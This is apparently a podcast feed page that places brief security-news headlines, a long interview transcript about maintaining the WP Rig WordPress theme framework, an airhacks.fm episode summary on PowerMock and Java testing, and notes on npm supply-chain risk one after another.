SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
n8n supply chain attack: Malicious npm packages were used to attempt to obtain user OAuth credentials for npm. https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem

Gogs 0-Day Exploited in the Wild: An at-the-time unpatched flaw in Gogs was exploited to compromise git repos. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit

Telegram Proxy Link Abuse: Telegram proxy links have been abused to deanonymize users. https://x.com/GangExposed_RU/status/2009961417781457129
Introducing Rob Ruiz

Meet Rob Ruiz, a seasoned Senior Full Stack Developer with nearly two decades of expertise in WordPress innovation and open-source magic. As the Lead Maintainer of WP Rig since 2020, Rob has been the driving force behind this groundbreaking open-source framework that empowers developers to craft high-performance, accessible, and progressively enhanced WordPress themes with ease. WP Rig isn’t just a starter theme—it’s a turbocharged toolkit that bundles modern build processes, linting, optimization, and testing to deliver lightning-fast, standards-compliant sites that shine on any device.

Show Notes

For more on Rob and WP Rig, check out these links:
LinkedIn Profile: https://www.linkedin.com/in/robcruiz
WP Rig Official Site: https://wprig.io
GitHub Repository: https://github.com/wprig/wprig
Latest Releases: https://github.com/wprig/wprig/releases
WP Rig 3.1 Announcement: https://wprig.io/wp-rig-3-1/

Transcript:

Topher DeRosia: Hey everybody. Welcome to Hallway Chats. I’m your host Topher DeRosia, and with me today I have-

Rob Ruiz: Rob Ruiz.

Topher: Rob. You and I have talked a couple of times, once recently, and I learned about a project you’re working on, but not a whole lot about you. Where do you live? What do you do for a living?

Rob: Yeah, for sure. Good question. Although I’m originally from Orlando, Florida, I’ve been living in Omaha, Nebraska for a couple of decades now. So I’m pretty much a native. I know a lot of people around here and I’ve been fairly involved in various local communities over the years. I’m a web developer. Started off as a graphic designer kind of out of college, and then got interested in web stuff. And so as a graphic designer turned future web developer, I guess, I was very interested in content management systems because it made the creating and managing of websites very, very easy. My first couple of sites were Flash websites, sites with Macromedia Flash.
Then once I found content management systems, I was like, “Wow, this is way easier than coding the whole thing from scratch with Flash.” And then all the other obvious benefits that come from that. So I originally started with Joomla, interestingly enough, and used Joomla for about two or three years, then found WordPress and never looked back. And so I’ve been using WordPress ever since. As the years have gone on, WordPress has enabled me to slowly transition from a more kind of web designer, I guess, to a very full-blown web developer and software engineer, and even software architect to some degree. So here we are many years later.

Topher: There’s a big step from designer to developer. How did that go for you? I’m assuming you went to PHP. Although if you were doing Flash sites, you probably learned ActionScript.

Rob: Yeah. Yeah. That was very convenient when I started learning JavaScript. It made it very easy to learn JavaScript faster because I already had a familiarity with ActionScript. So there’s a lot of similarities there. But yeah. Even before I started doing PHP, I started learning more HTML and CSS. I did do a couple of static websites between there that were just like no content management system at all. So I was able to kind of sharpen my sword there with the CSS and HTML, which wasn’t particularly hard. But yeah, definitely, the PHP… that was a big step, PHP, because it’s a proper logical programming language. There was a lot there I needed to unpack, and so it took me a while. I had to stick to it and really rinse and repeat before I finally got my feet under me.

Topher: I can imagine. All right. So then you work for yourself or you freelance or do you have a real job, as it were?

Rob: Currently, I do have a real job. Currently, I’m working at a company called Bold Orange out of Minneapolis. They’re a web agency. But I kind of bounce around from a lot of different jobs.
And then, yes, I do freelance on the side, and I also develop my own products as well for myself and my company.

Topher: Cool. Bold Orange sounds familiar. Who owns that?

Rob: To be honest, I don’t know who the owners are. It’s just a pretty big web agency out of Minneapolis. They are a big company. You could just look them up at boldorange.com. They work for some pretty big companies.

Topher: Cool. All right. You and I talked last about WP Rig. Give me a little background on where that came from and how you got it.

Rob: Yeah, for sure. Well, there was a period of time where I was working at a company called Proxibid that is in the auction industry, and they had a product or a service — I don’t know how you want to look at that — called Auction Services. That product is basically just building WordPress sites for auction companies. They tasked us with a way to kind of standardize those websites essentially. And what we realized is that picking a different theme for every single site made things difficult to manage and increased tech debt by a lot. So what we were tasked with was, okay, if we’re going to build our own theme that we’re just going to make highly dynamic so we can make it look different from site to site. So we want to build it, but we want to build it smart and we want to make it reusable and maintainable. So let’s find a good framework to build this on so that we can maintain coding standards and end up with as little tech debt as possible, essentially. That’s when I first discovered WP Rig. In my research, I came across it and others. We came across Roots Sage and some of the other big names, I guess. It was actually a team exercise. We all went out and looked for different ones and studied different ones and mine that I found was WP Rig. And I was extremely interested in that one over the other ones. Interestingly enough-

Topher: Can you tell me why over the other ones?

Rob: That’s a great question. Yeah. I really liked the design patterns.
I really liked the focus on WordPress coding standards. So having a system built in that checked all the code against WordPress coding standards was cool. I loved the compiling, transpiling, whatever, for CSS and JavaScript kind of built in. That sounded really, really interesting. The fact that there was PHP unit testing built into it. So there’s like a starter testing framework built in that’s easy to extend so that you can add additional unit tests as your theme grows. We really wanted to make sure… because we were very into CI/CD pipelines. So we wanted to make sure that as developers were adding or contributing to any themes that we built with this, that we could have automated tests run and automated builds run, and just automate as much as possible. So WP Rig just seemed like something that gave us those capabilities right out of the box. So that was a big thing. And I loved the way that they did it. Roots Sage does something similar, but they use their Blade templating engine built in there. We really wanted to stick to something that was a bit more standard WordPress so that there wasn’t like a large knowledge overhead so that we didn’t have to say like, okay, if we’re bringing on other developers, like junior developers work on it, oh, it would be nice if you use Laravel too because we use this templating engine in all of our themes. We didn’t want to have to worry about that essentially. It was all object-oriented and all that stuff too. That’s what looked interesting to me. We ended up building a theme with WP Rig. I don’t know what they ended up doing with it after that, because I ended up getting let go shortly thereafter because the company had recently been acquired. Also, this was right after COVID too. So there was just a lot of moving parts and changing things at the time. So I ended up getting let go. But literally a week after I got let go, I came across a post on WP Tavern about how this framework was looking for new maintainers.
Basically, this was a call put out by Morten, the original author of WP Rig. He reached out to WP Tavern and said, “Look, we’re not interested in maintaining this thing anymore, but it’s pretty cool. We like what we’ve built. And so we’re looking for other people to come in and adopt it essentially.” So I joined a Zoom meeting with a handful of other individuals that were also interested in this whole endeavor, and Morten reached out to me after the call and basically just said, “I looked you up. I liked some of the input that you had during the meeting. Let’s talk a little bit more.” And then that eventually led to conversations about me essentially taking the whole project over entirely. So, the branding, the hosting of the website, being lead maintainer on the project. Basically, gave me the keys to the kingdom in terms of GitHub and everything. So that’s how it ended up going in terms of the handoff between Morten and me. And I’m very grateful to him. They really created something super cool and I was honored to take it over and kind of, I don’t know, keep it going, I guess.

Topher: I would be really curious. I don’t think either of us have the answer. I’d be curious to know how similar that path is to other project handoffs. It’s different from like an acquisition. You didn’t buy a plugin from somebody. It was kind of like vibes, I guess.

Rob: It was like vibes. It was very vibey. I guess that’s probably the case in an open source situation. It’s very much an open source project. It’s a community-driven thing. It’s for everybody by everybody. I don’t know if all open source community projects roll like that, but that’s how this one worked out. There was some amount of ownership on Morten’s behalf. He did hire somebody to do the branding for WP Rig and the logo. And then obviously he was paying for stuff like the WPrig.io domain and the hosting through SiteGround and so on and so forth.
So, we did have to transfer some of that and I’ve taken over those, I guess, financial burdens, if you want to think of it like that. But I’m totally okay with it.

Topher: All right. You sort of mentioned some of the things Rig does, compiling and all that kind of stuff. Can you tell me… we didn’t discuss this before. I’m sitting at my desk and I think I want a website. How long does it take to go from that to looking at WordPress and logging into the admin with Rig?

Rob: Okay. Rig is not an environment management system like Local-

Topher: I’m realizing my mistake. Somebody sends me a design in Figma. How long does it take me to go from that to, I’m not going to say complete because I mean, that’s CSS, but you know, how long does it take me to get to the point where I’m looking at a theme that is mine for the client that I’m going to start converting?

Rob: Well, if you’re just looking for a starting point, if you’re just like, okay, how long does it take to get to like, okay, here’s my blank slate and I’m ready to start adopting all of these rules that are set up in Figma or whatever, I mean, you’re looking at maybe 5 minutes, 10 minutes, something like that. It’s pretty automated. You just need some simple knowledge of Git. And then there are some prerequisites to using WP Rig. You do have to have Composer installed because we do leverage some Composer packages for some of it, although to be honest, you could probably get away with not using Composer. You just have to be okay with sacrificing some of the tools that WP Rig assumes you’re going to have. And then obviously Node. You have to have Node installed. A lot of our documentation assumes that you have npm, that you’re using npm for all your Node or your package management. But we did recently introduce support for Bun. And so you can use Bun instead of npm, which is actually a lot faster and better in many ways.

Topher: Okay.
A lot of my audience are not developers, users, or light developers, like they’ll download a theme, hack a template, whatever. Is this for them? Am I boring those people right now?

Rob: That’s a great question. I mean, and I think this is an interesting dichotomy and paradigm in the WordPress ecosystem, because you’ve got kind of this great divide. At least this is something I’ve noticed in my years in the WordPress community is you have many people that are not coders or developers that are very interested in expanding their knowledge of WordPress, but it’s strictly from more of a marketing perspective where it’s like, I just want to know how to build websites with WordPress and how to use it to achieve my goals online from a marketing standpoint. You have that group of people, and then you have this other group of people that are very developer centric that want to know how to extend WordPress and how to empower those other people that we just discussed. Right?

Topher: Right.

Rob: So, yeah, that’s a very good question. I would say that WP Rig is very much designed for the developers, not for the marketers. The assumption there is that you’re going to be doing some amount of coding. Now, can you get away with doing a very light amount of coding? Yes. Yes, you can. I mean, if you compare what you’re going to get out of that assumed workflow to something that you would get off like ThemeForest or whatever, it’s going to be a night and day difference because those ThemeForest themes have hours, hundreds, sometimes hundreds of hours of development put into them. So, you’re not going to just out of the box immediately get something that is comparable to that.

Topher: You need to put in those hundreds of hours of development to make a theme.

Rob: As of today, yes. That may change soon though.

Topher: Watch this space.

Rob: That’s all I’ll say.

Topher: Okay. So now we know who it’s for. I’m assuming there’s a website for it. What is it?

Rob: Yeah.
If you go to WPrig.io, we have a homepage that shows you all the features that are there in WP Rig. And then there’s a whole documentation area that helps people get up and running with WP Rig because there is a small learning curve there that’s pretty palatable for anybody who’s familiar with modern development workflows. So that is a thing. So the type of person that this is designed for is anybody that wants to make a theme for anything. Let’s say you’re a big agency and you pull in a big client and that client wants something extremely custom and they come to you with Figma designs. Sure, you could go out there and find some premium theme and try to like child theme and overhaul that if you want. But in many situations, I would say in most situations, if you’re working from a Figma design that’s not based off of another theme already that’s just kind of somebody else’s brainchild, then you’re probably going to want to start from scratch. And so the idea here is that this is something to replace an approach like an underscores approach. Actually, WP Rig was based off of underscores. The whole concept of it, as Morten explained it to me, was that he wanted to build an underscores that was more modern and full-featured from a development standpoint.

Topher: Does it have any opinions about Gutenberg?

Rob: It does now, but it did not when I took it over because Gutenberg did not exist yet when I took over WP Rig.

Topher: Okay. What are its opinions?

Rob: Yeah, sure. The opinion right out of the gate is that you can use Gutenberg as an editor and it has support like CSS rules in it for the standard blocks. So you should be able to use regular Gutenberg blocks in your theme and they should look just fine. There’s no resets in there. It doesn’t start from scratch. There’s not a bunch of styling you have to do for the blocks necessarily.
Now, if you go to the full site editing or block-based mentality here, there are some things you need to do in WP Rig to convert the out-of-the-box WP Rig into another paradigm essentially. Right when you pull WP Rig, the assumption is you’re building what most people would refer to as a hybrid theme. The theme supports API or whatever, and the assumption is that you’re not going to be using the site editor. You’re just going to kind of do traditional WordPress, but you might be using Gutenberg for your content. So you’re just using Gutenberg kind of to author your pages and your posts and stuff like that, but not necessarily the whole site. WP Rig has the ability to kind of transform itself into other paradigms. So the first paradigm we built out was the universal theme approach. And the idea there is that you get a combination of the full site editing capabilities. But then you also have the traditional menu manager and the settings customizer framework or whatever is still there, right? These are things that don’t exist in a standard block-based theme. So I guess an easy example would be like the 2025 WordPress theme that comes right out of the box. It comes installed in WordPress. That is a true block-based theme, not a universal theme. So it doesn’t have those features because the assumption there is that it doesn’t need those features. You can kind of transform WP Rig into a universal theme that’s kind of a hybrid between a block-based and a classic theme. And then it can also transform into a strictly block-based theme as well. So following the same architecture as like the WordPress 2025 theme or Ollie or something like that is also a true block-based theme as well. So you can easily convert or transform the starting point of WP Rig into either of those paradigms if that’s the type of theme you’re setting out to build.

Topher: Okay. That sounds super flexible. How much work is it to do that?

Rob: It’s like one command line.
Previously we had some tutorials on the website that showed you step-by-step, like what you needed to change about the theme to do that. You would have to add some files, delete some files, edit some code, add some theme supports into the base support class and some other stuff. I have recently, as of like a year and a half ago or a year ago, created a command line or a command that you can type into the command line that basically does that entire conversion process for you in like the blink of an eye. It takes probably a second to a second and a half to perform those changes to the code and then you’re good to go. It is best to do that conversion before you start building out your whole theme. It’s not impossible to do it after. But you’re more likely to run into problems or conflicts if you’ve already set out building your whole theme under one paradigm, and then you decide how the project you want to switch over to block-based or whatever. You’re likely to run into the need to refactor a bunch of stuff in that situation. So it is ideal to make that choice extremely early on in the process of developing your theme. But either way it’ll still work. That’s just one of the many tools that exist in WP Rig to transform it or convert it in several ways. That’s just one example. There are other examples of ways that Rig kind of converts itself to other paradigms as well.

Topher: Yeah. All right. In my development life, I’ve had two parts to it. And one is the weekend hobbyist, or I download Kadence and I whip something up in 20 minutes because I just want to experiment, and the other is agency life where everything’s in Git, things are compiled, there are versions, blah, blah, blah. This sounds very friendly to that more professional pathway.

Rob: Absolutely. Yes. Or, I mean, there’s another situation here too.
If you’re a company who develops themes and publishes them to a platform like ThemeForest or any other platform, perhaps you’re selling themes on your own website, whatever, if you’re making things for sale, there’s no reason you couldn’t use WP Rig to build your themes. We have a bundle process that bundles your theme for publication or publishing. Whether you’re an agency or whether you’re putting your theme out for sale, it doesn’t matter, during that bundle process, it does actually white label the entire code base to where there’s no mention of WP Rig in the code whatsoever. Let’s say you were to build a theme that you wanted to put up for sale because you have some cool ideas. Say, page transitions now are completely supported in all modern or in most modern browsers. And when I say page transitions, for those that are in the know, I am talking about not single page app page transitions, but through website page transitions. You can now do that. Let’s say you were like, “Hey, I’m feeling ambitious and I want to put out some new theme that comes with these page transitions built in,” and that’s going to be fancy on ThemeForest when people look at my demo, people might want to buy that. You could totally use WP Rig to build that out into a theme and the bundle process will white label all of the code. And then when people buy your theme and download that code, if they’re starting to go through and look through your code, they’re not going to have any way of knowing that it was built with WP Rig unless they’re familiar with the base WP Rig architecture, like how it does its object-oriented programming. They might be familiar with the patterns that it’s using and be able to kind of discern like, okay, well, this is the same pattern WP Rig uses, so high likelihood it was built with WP Rig. But they’re not going to be able to know by reading through the code. It’s not going to say WP Rig everywhere. It’s going to have the theme name all over the place in the code.
Topher: Okay. So then is that still WP Rig code? It just changed its labels?

Rob: Yeah.

Topher: So, it’s not like you’re exporting HTML, CSS and JavaScript? The underlying Rig framework is still there.

Rob: Yeah. During the bundle process, it is bundling CSS and HTML. Well, HTML in the case of a block-based theme. But, yeah, it is bundling your PHP, your CSS, your JavaScript into the theme that you’re going to let people download when they buy it, or that you’re going to ship to your whatever client’s website. But all that code is going to be transpiled. In the case of CSS and JavaScript, there’s only going to be minified versions of that code in that theme. The source code is not actually going to be in there.

Topher: This sounds pretty cool. You mentioned some stuff might be coming. You don’t have to tell me what it is, but do you have a timeline? When should we be watching for the next cool thing from Rig?

Rob: Okay, cool. Well, I’m going to keep iterating on Rig forever. Regardless of any future products that might be built on WP Rig, WP Rig will always and forever remain an open source product for anybody to use for free and we, I, and possibly others in the future will continue to update it and support it over time. We just recently put out 3.1. You could expect 3.2 anytime in the next six months to a year, probably closer to six months. One feature I’m looking at particularly closely right now is the new stuff coming out in version 6.9 of WordPress around the various APIs that are there. I think one of them is called the form… There’s a field API and a form API or view API or something like that. So WP Rig comes with a React-based settings framework in it.
So if you want your theme to have a bunch of settings in it to make it flexible for whoever buys your theme, you can use this settings framework to easily create a bunch of fields, and then that framework will automatically manage all your fields and store all the data from those fields and make it easy to retrieve the values of the input on those fields, without knowing any React at all. Now, if you know React, you can go in there and, you know, embellish what’s already there, but it takes a JSON approach. So if you just understand JSON, you can go in and change the JSON for the framework, and that will automatically add fields into the settings framework. So you don’t even have to know React to extend the settings page if you want. That will likely get an overhaul using these new APIs being introduced into Rig.

Topher: All right. How often have you run into something where, “Oh, look, WordPress has a new feature, I need to rebuild my system”?

Rob: Over the last four or five years, it’s happened a lot because, yeah, I mean, like I said, when I first took this thing over, Gutenberg had not even been introduced yet. So, you had the introduction of Gutenberg and blocks. That was one thing. Then this whole full site editing became a thing, which later became the site editor. So that became a whole thing. Then all these various APIs. I mean, it happens quite frequently. So I’ve been working to keep it modern and up to date over the past four years and it’s been an incredible learning experience. It not only keeps my WordPress knowledge extremely sharp, but I’ve also learned how various other toolkits are built. That’s been the interesting thing. From a development standpoint, there’s two challenges here. One of the challenges is staying modern on the WordPress side of things. For instance, WordPress coding standards came out with a version 3 and then a version 3.1 about two years ago. I had to update WP Rig to leverage those modern coding standards.
So that’s one example: as WordPress changes, the code in WP Rig also needs to change. Or for instance, if new CSS standards change, right, new CSS properties come out, it is ideal for the base CSS in WP Rig, meaning the CSS that you get right out of the box with it, to come with some of these, for instance, CSS grid, Flexbox, stuff like that. If I was adopting a theme framework to build a theme on, I would expect some of that stuff to be in there. And those things were extremely new when I first took over WP Rig and were not all baked in there essentially. So I’ve had to add a lot of that over time. Now there’s another side to this, which is not just keeping up with WordPress and CSS and PHP 8-whatever, yada yada yada. You’ve also got the toolkit. There are various Node packages and Composer packages that power WP Rig, and the process in which it does the transpiling, the bundling, the automated manipulation of your code during various aspects of the usage of WP Rig is a whole nother set of challenges because now you have to learn concepts like, well, how do I write custom Node scripts? Right? Like there were no WP-CLI commands built into WP Rig when I first took it over. Now there’s a whole list. There’s a whole library of WP-CLI commands that come in Rig right out of the gate. And so I’ve had to learn about that. So just various things that come with knowing how do you automate the process of converting code, that’s something that was completely foreign to me when I first took over WP Rig. That’s been another incredible learning experience is understanding like what’s the difference between Webpack and Gulp. I didn’t know, right? I would tell people I’m using Gulp and WP Rig and they would be like, “Well, why don’t you just use Webpack?” and I would say, “I don’t know. I don’t know what the difference is.” So over time I could figure out what are the differences? Why aren’t we using Webpack?
And I’m glad I spent some time on that because it turns out Webpack is not the hottest thing anymore, so I just skipped right over all that. When I overhauled for version 3, we’re now not using Gulp anymore as of 3.1. We’re now using more of a Vite-like process, far more modern than Webpack and far better and faster and sleeker and lighter. I had to learn a bunch about what powers Vite. What is Vite doing under the hood that we might be able to also do in WP Rig, but do it in a WordPress way. Because Vite is a SaaS tool. If you’re building a SaaS, like React with a… we’re not a SaaS. I guess a SPA is a better term to use here. If you’re building a single page application with React or Vue or Svelte or whatever, right, then knowing what Vite is and just using Vite right out of the box is perfect. But it doesn’t translate perfectly to WordPress land because WordPress has its own opinions. And so I did have to do some dissecting there and figure out what to keep and what to not keep, what to kind of set aside so that WordPress can keep doing what WordPress does the way WordPress likes to do it, but also improve on how we’re doing some of the compiling and transpiling and the manipulation of the code during these various.

Topher: All right. I want to pivot a little bit to some personal-ish questions.

Rob: Okay.

Topher: This is a big project. I’m sure it takes up plenty of your time. How scalable is that in your life? Do you want to do this for the rest of your life?

Rob: That’s a fantastic question. I don’t know about the rest of my life. I mean, I definitely want to do web development for the rest of my life because the web has, let’s be honest, it’s transformed everyone’s way of life, whether you’re a web developer or not. You know, the fact that we have the internet in our pocket now, you know, it has changed everything. Apps, everything. It’s all built on the web. So I certainly want to be involved in the web the rest of my life.
Do I want to keep doing WordPress the rest of my life? I don’t know. Do I want to keep doing WP Rig the rest of my life? I don’t know. But I will say that you bring up a very interesting point, which is it does take up a lot of time, and also trust in open source over the past four or five years I would argue has diminished a little bit as a result of various events that have occurred over the past two or three years. I mean, we could cite the whole WP Engine Matt Mullenweg thing. We can also cite what’s going on with Oracle and JavaScript. Well, I mean, there’s many examples of this. I mean, we can cite the whole thing that happened… I mean, there’s various packages out there that are used and developed and open source to anybody, and some of them are going unmaintained and it’s causing security vulnerabilities and degradation and all this stuff. So it’s a very important point. One thing I started thinking about after considering that in relation to WP Rig was I noticed that there’s usually a for-profit arm of any of these frameworks that seems to extend the lifespan of it. Let’s just talk about React, for example. React is an open source JavaScript framework, but it’s used by Facebook and Facebook is extremely for-profit. So companies that are making infrastructural or architectural decisions, they will base their choice on whether or not to use a framework largely on how long they think this framework is going to remain relevant or valid or maintained, right? A large part of that is, well, is there a company making money off of this thing? Because if there is, the chances-

Topher: They’re going to keep doing that.

Rob: They’re going to keep doing it. It’s going to stay around. That’s good. I think that’s healthy. A lot of people that like open source and want everything to be free, they might look at something like that and say like, well, I don’t want you to make a paid version of it or there shouldn’t be a pro version.
I think that’s a very short-sighted way of looking at that software and these innovations. I think a more experienced way of looking at it is if you want something to remain relevant and maintained for a long period of time, having a for-profit way in which it’s leveraged is a very good thing. I mean, let’s be real. Would WordPress still be what it is today if there wasn’t a wordpress.com or if WooCommerce wasn’t owned by Automattic or whatever, right? They’ll be on top. I mean, it’s obviously impossible to say, but my argument would be, probably not. I mean, look at what’s happened to the other content management systems out there. You know, Joomla, Drupal. They don’t really have a flourishing, you know, paid pro service that goes with their thing that’s very popular, at least definitely not as popular as WordPress.com or WordPress VIP or some of these other things that exist out there. And so having something that’s making and generating money that can then contribute back into it the way Automattic has been doing with WordPress over these years has, in my opinion, been instrumental. I mean, people can talk smack about Gutenberg all they want, but let’s be real, it’s 2025, would you still feel that WordPress is an elegant solution if we were still working from the WYSIWYG and using the classic editor? And I know a lot of people are still using the classic editor and there’s ClassicPress, the fork and all that stuff. But I mean, that only makes sense in a very specific implementation of WordPress, a very specific paradigm. If you want to explore any of these other paradigms out there, that way of thinking about WordPress kind of falls apart pretty quickly. I, for one, am happy that Gutenberg exists. I’m very happy that Automattic continues. And I’m grateful, actually, that Automattic continues to contribute back into WordPress. And not just them, obviously there’s other companies, XWP, 10up, all these other companies are also contributing as well.
But I’m very grateful that this ecosystem exists and that there’s contribution going back in and it’s happening from companies that are making money with this. And I think that’s vital. All that to say that WP Rig may and likely will have paid products in the future that leverage WP Rig. So that’s not to say that WP Rig will eventually cost money. That’s just to say that eventually people can expect other products to come out in the future that will be built on WP Rig and incentivize the continued contributions back into WP Rig. The open source version of WP Rig. Topher: That’s cool. I think that’s wise. If you want anything to stay alive, you have to feed it. Rob: That’s right. Topher: I had some more questions but I had forgotten them because I got caught up in your answer. Rob: Oh, thank you. I’ll take that as a compliment. I mean, my answer was eloquent. But I’m happy to expand on anything, you know, WordPress related, me related, you know, whether it comes to the ecosystem in WordPress, the whole WordCamp meetup thing is very interesting. I led the WP Omaha meetup for many years here in Omaha, Nebraska and I also led the WordCamp, the organizing of WordCamp here in Omaha for several years as well. That whole community, the whole ecosystem, at least in America seems to have largely fallen apart. I don’t know if you want to talk about that at all. But yeah, I’m ready to dive into any topics. Topher: I’m going to have one more question and then we’re going to wrap up. And it was that you were talking about all the things you had to learn. I’m sure there were nights where you were looking at your computer thinking, “Oh man, I had it working, now I gotta go learn a new thing.” I would love for you to go back in time and blog all of that if you would. But given that you can’t, I would be interested in a blog moving forward, documenting what you’re learning, how you’re learning it and starting maybe with a post that summarizes all of that. 
Obviously, that’s up to you and how you want to spend your time, but I think it’d be really valuable to other people starting a project, picking up somebody else’s project to see what the roadmap might look like. You know what I mean? Rob: For sure. Well, I can briefly summarize what I’ve learned over the years and where I’m at today with how I do this kind of stuff. I will say that a lot of the improvements to WP Rig that have happened over the last year or two would not be possible without the advent of AI. Topher: Interesting. Rob: That’s a fancy way of saying that I have been vibe coding a lot of WP Rig lately. If you know how to use AI, it is extremely powerful and it can help you do many things very quickly that previously would have taken much longer or more manpower. So, yeah, perhaps if there was like five, six, seven people actively, excuse me, actively contributing to WP Rig, then this type of stuff would have been possible previously, but that’s not the case. There is one person, well, one main contributor to WP Rig today and you’re talking to them. There are a handful of other people that have been likely contributing to WP Rig over the versions and you can find their contributions in the change log file in WP Rig. But those contributions have been extremely light compared to what I’ve been doing. I wouldn’t be able to do any of it without AI. I have learned my ability to learn things extremely rapidly has ramped up tenfold since I started learning how to properly leverage LLMs and AI. So that’s not to say that like, you know, WP Rig, all the code is just being completely written by AI and I’m just like, make it better, enter, and then like WP Rig is better. I wish it was that easy. It’s certainly not that. But when I needed to start asking some of these vital questions that I really didn’t have anyone to turn to to help answer them, I was able to turn to AI. For instance, let’s go back to the webpack versus Gulp situation. 
Although Gulp is no longer used in WP Rig, you know, it was used in WP Rig until very recently. So I had to understand like, what is this system, how does it work, how do I extend it and how do I update it and all these things, right? And why aren’t we using webpack and you know, is there validity to this criticism behind you should use webpack instead of Gulp or whatever, right? I was able to use AI to ask these questions and be able to get extremely good answers out of it and give me the direction I needed to make some of these kind of higher level decisions on like architecturally where should WP Rig go? It was through these virtual conversations with LLMs that I was able to refine the direction of WP Rig in a direction that is both modern and forward-thinking and architecturally sound. I learned a tremendous amount from AI about the architecture, about the code, about all of it. My advice to anybody that wants to extend their skill set a little bit in the development side of things is to leverage this new thing that we have in a way that is as productive as possible for you. So that’s going to vary from person to person. But for me, if I’m on a flight or if I’m stuck somewhere for a while, like, let’s say I got to take my kid to practice or something and I’m stuck there for an hour and I got to find some way to kill my time, 9 times out of 10, I’m on my laptop or on my phone having conversations with Grok or ChatGPT or Gemini or whatever. I am literally refining… I’m just sitting there asking it questions that are on my mind that I wish I could ask somebody who’s like 10 times more capable than me. It has been instrumental. WP Rig wouldn’t be where it is today if it wasn’t for that. I would just say to anybody, especially now that it’s all on apps and you don’t have to be on a browser anymore, adopt that way of thinking. 
You know, if you’re on your lunch break or whatever and you have an hour lunch break and you only take 15 minutes to eat, what could you be doing with those other 45 minutes? You could just jump on this magical thing that we have now and start probing it for questions. Like, Hey, here’s what I know. Here’s what I don’t know. Fill these knowledge gaps for me.” And it is extremely good at doing that. Topher: So my question was, can you blog this and your answer told me that there’s more there that I want to hear. That’s the stuff that should be in your book when you write your book. Rob: I’m flattered that you would be interested in reading anything that I write. So thank you. I’ve written stuff in the past and it hasn’t gotten a lot of attention. But I also don’t have any platforms to market it either. But yeah, no, I made some… I’m sorry. Topher: I think your experience is valuable far beyond Rig or WordPress. If you abstract it out of a particular project to say, you know, I did this with a project, I learned this this way, I think that would be super valuable. Rob: Well, I will say that recently at my current job, I was challenged to create an end to end testing framework with Playwright that would speed up how long it takes to test things and also prevent, you know, to make things fail earlier, essentially, to prevent broken things from ending up in the wild, right, and having to catch them the hard way. I didn’t know a lot about Playwright, but I do know how toolkits work now because of WP Rig. And I was able to successfully in a matter of, I don’t know, three days, put together a starter kit for a test framework that we’re already using at work to test any website that we create for any client. It can be extended and it can be hooked into any CI CD pipeline and it generates reports for you and it does a whole bunch of stuff. I was able to do this relatively quickly. This knowledge, yes, does come in handy in other situations. 
Will I end up developing other toolkits like WP Rig in the future for other things? I guess if I can give any advice to anybody listening out there, another piece of advice I would give people is, you know, especially if you’re a junior developer and you’re still learning or whatever, or you’re just a marketing person and just want to have more control over the functionality side of what you’re creating or more insight into that so you could better, you know, manage projects or whatever. My advice would be to take on a small little project that is scoped relatively small that’s not too much for you to chew and go build something and do it with… Just doing that will be good. But if you can do it with the intent to then present it in some fashion, whether it be a blog article or creating a YouTube video or going to a meetup and giving a talk on it or even a lunch and learn at work or whatever, right, that will, in my experience, it will dramatically amplify how much you learn from that little pet project that’s kind of like a mini learning experience. And I highly encourage anybody out there to do that on the regular. Actually, no matter what your experience level is in development, I think you should do these things on a regular basis. Topher: All right. I’m going to wrap this up. I got to get back to work. You probably have to get back to work. Rob: Yeah. Topher: Thanks for talking. Rob: Thanks for having me, Topher. Really appreciate it. Topher: Where could people find you? WPrig.io? Rob: Yeah, WPrig.io. WP rig has accounts on all of the major platforms and, even on Bluesky and Mastodon. You can look me up, Rob Ruiz. You can find me on LinkedIn. You can find me on all of those same platforms as well. You can add me on Facebook if you want, whatever. And I’m also in the WordPress Slack as well as Rob Ruiz. You can find me in the WordPress Slack. And then I’m on the WordPress Reddit and all that stuff. So yeah, reach out. 
If anybody wants to have any questions about Rig or anything else, I’m happy to engage. Topher: Sounds good. All right, I’ll see you. Rob: All right, thanks, Topher. Have a good day. Topher: This has been an episode of the Hallway Chats podcast. I’m your host Topher DeRosia. Many thanks to our sponsor Nexcess. If you’d like to hear more Hallway Chats, please let us know on hallwaychats.com.
An airhacks.fm conversation with Johan Haleby (@johanhaleby) about: first computer experience with Commodore C64 and typing Basic programs from instruction manuals, early gaming experiences and interest in understanding load commands, transition to Amiga 500 Plus for demo scene scripting and composition, moving to PC era with 486 SX25 and four megabytes of RAM, learning Turbo Pascal and creating 2D Super Mario-inspired games, experimenting with inline assembler in Pascal and reading "The Art of Assembly Programming", reverse engineering games using a Win32 disassembler to bypass license checks, studying computer science at Blekinge and Lund University in Sweden, first job at JayWay consultancy firm working on an IKEA project in 2005, early adoption of the Spring framework and automated testing practices, comparison of old-style EJB with heavy XML configuration versus Spring's lightweight approach, the evolution from XML-based configuration to annotation-based Java EE 5 and 6, creating PowerMock with colleague Jan Kronqvist to mock static methods and final classes, using ASM and Javassist for bytecode manipulation instead of AspectJ, implementing custom class loaders where each JUnit method executed in a different class loader, a deep clone module for cloning object graphs between class loaders, tight coupling challenges between PowerMock and Mockito/EasyMock/JUnit versions, transition from EasyMock's record-replay pattern to Mockito's when-then approach, modern preference for avoiding mocks and testing against real cloud environments, optimizing for fast CI/CD pipelines rather than local simulation, structuring code to separate infrastructure concerns from pure business logic, using Java Records as pure data carriers versus adding behavior to records, Clojure-inspired philosophy of decoupling state from behavior and identity, Rich Hickey's "Simple Made Easy" talk and definitions of simple versus easy, multi-methods in functional languages as an alternative to polymorphism, a domain modeling example with network devices and fiber channel connections, benefits of object-oriented polymorphism for transparent persistence and simple code, avoiding religious adherence to patterns in favor of pragmatic solutions, Maven's stability and opinionated approach versus Gradle's flexibility, reducing external dependencies and Maven plugins in favor of CI/CD automation, the NPM ecosystem's over-modularization compared to Java's more reasonable approach, decline of OSGi hype and return to simpler monolithic architectures, Johan's current work on the Occurrent Event Sourcing library and CloudEvents.
Johan Haleby on Twitter: @johanhaleby
⬥EPISODE NOTES⬥
Modern application development depends on open source packages moving at extraordinary speed. Paul McCarty, Offensive Security Specialist focused on software supply chain threats, explains why that speed has quietly reshaped risk across development pipelines, developer laptops, and CI environments.

JavaScript dominates modern software delivery, and the npm registry has become the largest package ecosystem in the world: millions of packages, thousands of daily updates, and deeply nested dependency chains, often exceeding a thousand indirect dependencies per application. That scale creates opportunity, not only for innovation, but for adversaries who understand how developers actually build software.

